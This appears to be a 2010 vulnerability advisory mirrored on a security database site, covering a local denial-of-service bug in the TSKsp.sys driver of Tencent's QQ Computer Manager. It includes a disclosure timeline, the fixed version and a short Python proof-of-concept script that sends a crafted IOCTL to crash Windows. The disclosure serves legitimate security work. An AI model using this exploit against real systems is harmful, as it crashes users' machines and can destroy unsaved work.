Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24434
HistoryAug 09, 2010 - 12:00 a.m.

QQ Computer Manager TSKsp.sys Driver Local Denial of Service Vulnerability

2010-08-0900:00:00
vulners.com
11

QQ Computer Manager TSKsp.sys Driver Local Denial of Service Vulnerability

By Lufeng Li of Neusoft Corporation

Vulnerable: QQpcmgr<=v4.0Beta1

Vendor: Tencent Inc

1) Software Description:
QQ doctors more than three years after the development and operation, and finally ushered in the fourth
generation - QQ Computer Manager 4.0 . QQ butler 4.0 version of

the computer not only doctors and QQ QQ integrated software management, and increased cloud killing
horses, clean up the core function of plug-ins; addition,QQ computer

butler innovative features introduced software to move, you can easily solve the insufficient disk space
C problem.

2) Details:
A local denial of service vulnerability in QQ Computer Manager that handling ioctl request. A successful
attack can lead to BSoD.

3) Timeline:
2010.07.01 Vendor notified
2010.07.22 Vendor released new fixed versions
2010.08.09 Advisory released

4) Solution:
Update to version QQPCMgr_40_278.

5) Exploit:
#!/usr/bin/python

#################################################################

Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit

Author: Lufeng Li of Neusoft Corporation

Vendor: http://pcmgr.qq.com

Platform: Windows XPSP3 Chinese Simplified

Tested: QQpcmgr v4.0Beta1

Vulnerable: QQpcmgr<=v4.0Beta1

#################################################################
from ctypes import *

kernel32 = windll.kernel32
Psapi = windll.Psapi

if name == 'main':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2

DEVICE_NAME   = &quot;&#92;&#92;&#92;&#92;.&#92;&#92;tsksp&quot;
dwReturn      = c_ulong&#40;&#41;
out_data      = &#39;&#39;
in_data       = &#39;&#39;
driver_handle1 = kernel32.CreateFileA&#40;DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
                                            0, None, CREATE_ALWAYS, 0, None&#41;
dev_ioctl = kernel32.DeviceIoControl&#40;driver_handle1, 0x22e01c, in_data,0, out_data,

0,byref(dwReturn), None)


Confidentiality Notice: The information contained in this e-mail and any accompanying attachment(s)
is intended only for the use of the intended recipient and may be confidential and/or privileged of
Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of this communication is
not the intended recipient, unauthorized use, forwarding, printing, storing, disclosure or copying
is strictly prohibited, and may be unlawful.If you have received this communication in error,please
immediately notify the sender by return e-mail, and delete the original message and all copies from
your system. Thank you.